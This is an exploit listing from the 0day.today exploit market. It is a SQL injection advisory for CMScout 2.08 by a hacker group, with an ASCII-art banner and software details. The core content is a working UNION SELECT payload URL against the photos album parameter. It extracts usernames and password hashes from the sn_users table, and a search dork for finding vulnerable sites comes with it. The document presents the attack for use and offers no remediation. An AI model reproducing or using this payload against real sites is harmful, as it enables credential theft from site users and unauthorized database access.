[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CMScout 2.08 SQL Injection Vulnerability

Author
Dr.0rYX
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12004
Category
web applications
Date add
26-04-2010
Platform
php
========================================
CMScout 2.08 SQL Injection Vulnerability
========================================

# Title: CMScout 2.08 SQL Injection Vulnerability
# EDB-ID:
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr.0rYX and Cr3w-DZ
# Published:
# Verified:
# Download Exploit Code
# Download N/A
 
  NNNN      NNNN        AAAAAA          SSSSSSSS      TTTTTTTTTTTT                                               
  NNNNNN    NNNN        AAAAAA        SSSSSSSSSSSS    TTTTTTTTTTTT                                               
  NNNNNN    NNNN      AAAA  AAAA      SSSS                TTTT          eeeeee        aaaaaa      mmmm  mm  mmmm 
  NNNNNNNN  NNNN      AAAA  AAAA      SSSSSSSSSS          TTTT        eeee  eeee    aaaa  aaaa    mmmmmmmmmmmmmmmm
  NNNN  NNNNNNNN    AAAA      AAAA        SSSSSSSS        TTTT        eeeeeeeeee        aaaaaa    mmmm  mmmm  mmmm
  NNNN    NNNNNN    AAAAAAAAAAAAAA            SSSS        TTTT        eeee          aaaa  aaaa    mmmm  mmmm  mmmm
  NNNN    NNNNNN    AAAAAAAAAAAAAA    SSSSSSSSSSSS        TTTT        eeeeeeeeee    aaaa  aaaa    mmmm  mmmm  mmmm
  NNNN      NNNN  AAAA          AAAA    SSSSSSSS          TTTT          eeeeee      aaaaaaaaaa    mmmm  mmmm  mmmm
 
 
 
 
                                ALGERIAN HACKER
  **********************- NORTH-AFRICA SECURITY TEAM -***********************
  
[!] Title     :  CMScout 2.08 SQL Injection Vulnerability
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de
  
***************************************************************************/
  
[ Software Information ]
  
[+] Vendor   : http://www.cmscout.za.net/
[+] script   : CMScout 2.08
[+] Download : http://www.cmscout.co.za/index.php?page=downloads&menuid=9
[+] Vulnerability : php SQL injection
[+] Dork :Powered by CMScout (c)2005 CMScout Group
 
  
**************************************************************************/
[ Vulnerable File ]
  
http://server/index.php?page=photos&album=[N.A.S.T ]
  
[ Exploit ]
  
http://server/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users--
  
  
  
[ Example  ]
  
http://[site]/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users--
  


#  0day.today [2024-12-26]  #